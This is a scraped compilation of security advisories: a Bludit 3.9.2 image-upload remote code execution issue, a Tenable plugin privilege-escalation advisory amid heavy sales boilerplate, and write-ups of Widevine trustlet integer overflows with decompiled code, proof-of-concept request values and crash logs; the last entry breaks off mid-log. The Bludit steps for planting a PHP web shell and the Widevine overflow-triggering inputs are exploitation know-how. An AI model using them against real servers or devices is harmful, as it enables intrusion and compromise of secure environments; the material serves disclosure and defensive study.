Bludit 3.9.2 is vulnerable to Remote Code Execution (RCE) via /admin/ajax/upload-images.

**A Code Execution Vulnerability in Bludit v3.9.2****There is a Code Execution Vulnerability which allow to get server permissions,the url is /admin/ajax/upload-images****1, login with any account which allows you to edit content**

**2, click the button of Images to upload a picture**

**3 change the name and content of the file and then upload**

and also upload a.htaccess file

The file will now be under the TMP folder  

**4 visit evil php http://127.0.0.1/bludit-3-9-2/bl-content/tmp/shell.php**

**PHP version**

PHP 7.3.2

CVE-2020-20210: Bludit v3.9.2 Code Execution Vulnerability in "Images Upload" · Issue #1079 · bludit/bludit

Vulnerability in Tenable Tenable.Io, Tenable Nessus, Tenable Security Center.This issue affects Tenable.Io: before Plugin Feed ID #202306261202 ; Nessus: before Plugin Feed ID #202306261202 ; Security Center: before Plugin Feed ID #202306261202 .

This vulnerability could allow a malicious actor with sufficient permissions on a scan target to place a binary in a specific filesystem location, and abuse the impacted plugin in order to escalate privileges.




_This page contains information regarding security vulnerabilities that may impact Tenable's products. This may include issues specific to our software, or due to the use of third-party libraries within our software. Tenable strongly encourages users to ensure that they upgrade or apply relevant patches in a timely manner._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TNS-2023-21

Credit

Patrick Romero - CrowdStrike

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin, Tenable Web App Scanning and Tenable Cloud Security.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin, Tenable Web App Scanning and Tenable Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management, Tenable Lumin and Tenable Cloud Security.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management, Tenable Web App Scanning and Tenable Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable Cloud Security**

_Formerly Tenable.cs_

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now. To learn more about the trial process click here.

Your Tenable Cloud Security trial also includes Tenable Vulnerability Management, Tenable Lumin and Tenable Web App Scanning.

**Contact a Sales Rep to Buy Tenable Cloud Security**

Contact a Sales Representative to learn more about Tenable Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-2005: [R1] Tenable Plugin Feed ID #202306261202 Fixes Privilege Escalation Vulnerability

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_save_keys file_name_len integer overflow and resultant buffer overflow.

CVE-2022-48332:

Buffer Overflow in Widevine Trustlet (drm\_save\_keys @ 0x6a18)

 

CVE:

CVE-2022-48332

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_save_keys() command. This command closely resembles drm_verify_keys(), which has been featured in other blog entries (refer to CVE-2022-48333 and CVE-2022-48334).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50001: // drm\_save\_keys() command
    if ((0x2a10 < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        ...
        drm\_save\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\], // file\_name
            req\_buf + 0x84, req\_buf\[3\], // msg
            resp\_buf + 4                // prt\_path (result)
        );
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50001, it jumps to the drm_save_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    uint32\_t msg\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
    char msg\_data\[0x100\];
};

It contains three buffers (_i.e._, feature_name, file_name and msg_data) and three integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len, file_name_len and msg_len, since they are directly taken from the Request Buffer.

The main functionality of drm_save_keys() is securely storing encryption keys or DRM-related data. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent key storage.
>     
> *   Construct a file path using the provided feature name and file name.
>     
> *   Write the message data, which may contain encryption keys or DRM-related information, to a Secure File System (SFS).
>     
> *   Compute and store a CRC value for the written data to ensure data integrity and error detection.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len;
// ---- CVE-2022-48331 ---- //
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);
    // ----------------------- //
    \*(heap\_buf + total\_len) \= '/';
    if (total\_len + feature\_name\_len < 0xff) {
        memcpy(heap\_buf + total\_len + 1, feature\_name, feature\_name\_len);
        total\_len += (feature\_name\_len + 1);        \*(heap\_buf + total\_len) \= '/';
        // ---- CVE-2022-48332 ---- //
        if (total\_len + file\_name\_len < 0xff) {            memcpy(heap\_buf + total\_len + 1, file\_name, file\_name\_len);            ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The first part corresponds to CVE-2022-48331, where the check if (total_len < 0x100) is performed using a signed integer and can cause a buffer overflow if feature_name_len takes any value from -14 (0xfffffff2) to -1 (0xffffffff).

To pass this first check without triggering the first bug, the value of feature_name_len must be within the inclusive range of 1 to 241. Then, the code appends the feature_name string two times to the temporary heap buffer. In the previous code snippet, there is a second check on feature_name_len that constraints its value to \[1, 120\]. Finally, there is a third if that checks the value of file_name_len. At this point, the result of the addition is treated as a signed integer, which leads to an incorrect check. Consequently, this third check is bypassed when the values for file_name_len are sufficiently large:

req.feature\_name\_len \= 120; // valid values are: \[1, 120\]
req.file\_name\_len \= \-(14 + (2 \* req.feature\_name\_len) + 1);

The code after the check calls the memcpy() function to copy the contents of the file_name string into the heap buffer, using the improperly checked file_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The user has full control over the **value** of file_name_len and the **contents** of the file_name buffer in the Request Buffer.

Since there are several specific and large file_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50001;  // drm\_save\_keys;
req\->feature\_name\_len \= 1;
req\->file\_name\_len \= 0xffffffff;
req\->msg\_len \= 1;
...

The Commmand ID 0x50001 is specified to invoke drm_save_keys(), and file_name_len is set to 0xffffffff so that the sum of total_len + file_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_save\_keys: feature\_name 0xfff00010, feature\_name\_len 1, file\_name 0xfff00110,  file\_name\_len 4294967295, msg\_data 0xfff00210
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48332: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_verify_keys prefix_len+feature_name_len integer overflow and resultant buffer overflow.

CVE-2022-48333:

Buffer Overflow in Widevine Trustlet (drm\_verify\_keys @ 0x730c)

 

CVE:

CVE-2022-48333

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50002: // drm\_verify\_keys() command
    if ((0x2a0f < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        drm\_verify\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\]  // file\_name
        );
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50002, it jumps to the drm_verify_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
};

It contains two buffers (_i.e._, feature_name and file_name) and two integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len and file_name_len, since they are directly taken from the Request Buffer.

The main functionality of drm_verify_keys() is to verify the integrity of encryption keys or DRM-related data stored within the Widevine DRM system. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent the verification process.
>     
> *   Construct a full file path using the provided feature name and file name.
>     
> *   Set the CRC (cyclic redundancy check) file path, which is used for verifying the integrity of the keys.
>     
> *   Verify the stored encryption keys or DRM-related data and check for any tampering or corruption.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len; // Signed int
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);    ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The bug is present in this calculation. Since total_len is a signed integer, this calculation causes an integer overflow if the sum of prefix_len and feature_name_len is large enough, resulting in a negative value for total_len. As a result, the subsequent if statement passes even if the actual total length of the string is greater than the allocated buffer size.

Since the check is if (total_len < 0x100), for the condition 14 + feature_name_len < 0x100 to be triggered, the value of feature_name_len must be within the inclusive range of -14 to 241.

The code after the check calculates again the prefix_len and calls the memcpy() function to copy the contents of the feature_name string into the buffer, immediately following the persist_prefix, using feature_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The range of values for feature_name_len that can cause a buffer overflow extends from -14 (0xfffffff2) to -1 (0xffffffff).

The user has full control over the **value** of feature_name_len and the **contents** of the feature_name buffer in the Request Buffer.

Since there are 14 specific and large feature_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50002;  // drm\_verify\_keys
req\->feature\_name\_len \= 0xffffffff;
req\->file\_name\_len \= 1;
...

The Commmand ID 0x50002 is specified to invoke drm_verify_keys(), and feature_name_len is set to 0xffffffff so that the sum of prefix_len + feature_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_verify\_keys: feature\_name 0xfff00010, feature\_name\_len 4294967295, file\_name 0xfff00110,  file\_name\_len 1"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48333: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 7.1.1 has a PRDiagParseAndStoreData integer overflow and resultant buffer overflow.

CVE-2022-48336:

Buffer Overflow in Widevine Trustlet (PRDiagParseAndStoreData @ 0x5cc8)

 

CVE:

CVE-2022-48336

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s PRDiagProvisionDataHandler() command.

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50004: // PRDiagProvisionDataHandler
    if ((0x2807 < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        ret \= PRDiagProvisionDataHandler(req\_buf + 2, req\_buf\[1\]);
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50004, it jumps to the PRDiagProvisionDataHandler() function.

The structure of the Request Buffer for the PRDiagProvisionDataHandler() function is similar to the one used in PRDiagMaintenanceHandler (refer to CVE-2022-48335):

struct widevine\_PRDiagProvisionDataHandler\_cmd {
        uint32\_t cmd\_id;
        uint32\_t payload\_size;
        struct widevine\_PRDiagProvisionDataHandler\_payload payload;
};

It contains an embedded structure and an integer indicating its size. The embedded structure is defined in the following code-block:

// Internal payload/request buffer for PRDiagProvisionDataHandler command
struct PRDiagProvisionDataHandler\_payload {
        enum {
                op\_PRDiagParseAndStoreData      \= 0,
                PRDiagPDH\_FORCE\_ENUM\_32\_BITS \= (INT\_MAX | ~INT\_MAX),
        } op;
        uint32\_t compare\_flag;
        uint32\_t msg\_buf\_size;
        uint32\_t data\_len;
        // NOTE: The widevine trustlet checks the size of the request buffer
        // containing the widevine\_PRDiagMaintenanceHandler\_cmd structure.
        // The entire request buffer must have at least 0x2808 bytes
        char msg\_buf\[\];
};

The PRDiagProvisionDataHandler function firstly determines if keys can be provisioned and then simply copies the payload/request into a temporary heap buffer and passes it to the PRDiagParseAndStoreData() function:

int PRDiagProvisionDataHandler(void \*payload, uint32\_t payload\_size) {
     struct widevine\_PRDiagProvisionDataHandler\_payload \*req;

     ...
     // Check if keys can be provisioned
     ...

     if (!payload || !payload\_size) return 0x10;

     req \= malloc(payload\_size);
     if (!req) return 0xf;

     memcpy(req, payload, payload\_size);
     if (req\->op \== 0) {
         PRDiagParseAndStoreData(req);
     }
     ...

The bug is inside the PRDiagParseAndStoreData function. The main functionality of this function is to store provisioning data into the Secure File System (SFS). The following code snippet shows a simplified version of the PRDiagParseAndStoreData function:

int PRDiagParseAndStoreData(struct PRDiagProvisionDataHandler\_payload \*req) {
    // Check input and operation
    if (!req || req\->op != 0) return 0x10;

    msg\_buf\_size \= req\->msg\_buf\_size;
    msg\_buf \= &req\->msg\_buf;

    if (!req\->data\_len) {
        // CVE-2015-6639
        ...
    }
    else {
        // data\_len is not zero
        // filePathBuffer @ 0x2e0fc
        // fullFilePathBuffer @ 0x2e5fc
        memzero(&fullFilePathBuffer, 0x80);
        pcVar2 \= strncpy(&fullFilePathBuffer, &persist\_prefix, 0x80);
        sVar3 \= strlen(&filePathBuffer);
        sVar4 \= strlen(&persist\_prefix);
        memcpy(&fullFilePathBuffer + sVar4, &filePathBuffer, sVar3);
        sVar3 \= strlen(&filePathBuffer);
        pcVar2\[&fullFilePathBuffer + sVar3\] \= '/';
        sVar4 \= strlen(&filePathBuffer);
        memcpy(&filePathBuffer + 1 + pcVar2 + sVar3, &filePathBuffer, sVar4);
        iVar5 \= PRDiagPruneTrailingSlashes(&fullFilePathBuffer);
        if (msg\_buf\_size + iVar5 < 0x80) {            if (iVar5 \>= 1) {
                (&fullFilePathBuffer)\[iVar5\] \= '/';
                memcpy(&fullFilePathBuffer + 1 + iVar5, msg\_buf, msg\_buf\_size);                ...

The function first performs some validations on the input and the operation being requested and then checks the data_len value. If this value is not zero, it constructs a file path by concatenating two strings: persist_prefix and filePathBuffer, which are global buffers stored in the data segment. The resulting SFS file path is stored in the fullFilePathBuffer variable, which is used later in the function to write the provisioning data.

The persist_prefix string is initialized with the value "/persist/data/" by default, and the filePathBuffer is initially empty, so that the total length of the final string afer calling PRDiagPruneTrailingSlashes() is 13. After that, the contents of the user-controlled msg_buf are appended to fullFilePathBuffer after checking if the length does not exeed 128 bytes.

The bug is present in this check. Since the addition is done using a signed integer, this calculation causes an integer overflow if the sum of msg_buf_size and the string length of fullFilePathBuffer is large enough, resulting in a negative value and bypassing the if statement. Consequently, the subsequent memory copy can cause a buffer overflow:

The range of values for msg_buf_size that can cause a buffer overflow extends from -13 (0xfffffff3) to -1 (0xffffffff).

The user has full control over the **value** of msg_buf_size and the **contents** of the msg_buf buffer in the Request Buffer.

Since there are 13 specific and large msg_buf_size values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50004;  // PRDiagProvisionDataHandler
req\->payload.op \= 0;    // PRDiagParseAndStoreData
...
req\->payload.msg\_buf\_size \= 0xffffffff;
req\->payload.data\_len \= 1;

The Commmand ID 0x50004 is specified to invoke PRDiagProvisionDataHandler(), and the PRDiagParseAndStoreData operation is being specified. In addition, msg_buf_size is set to 0xffffffff so that the sum of msg_buf_size + iVar5 overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "PRDiagProvisionDataHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagParseAndStoreData: begins!"
<5>widevine: "PRDiagPruneTrailingSlashes:  pPath 0x2e5fc"
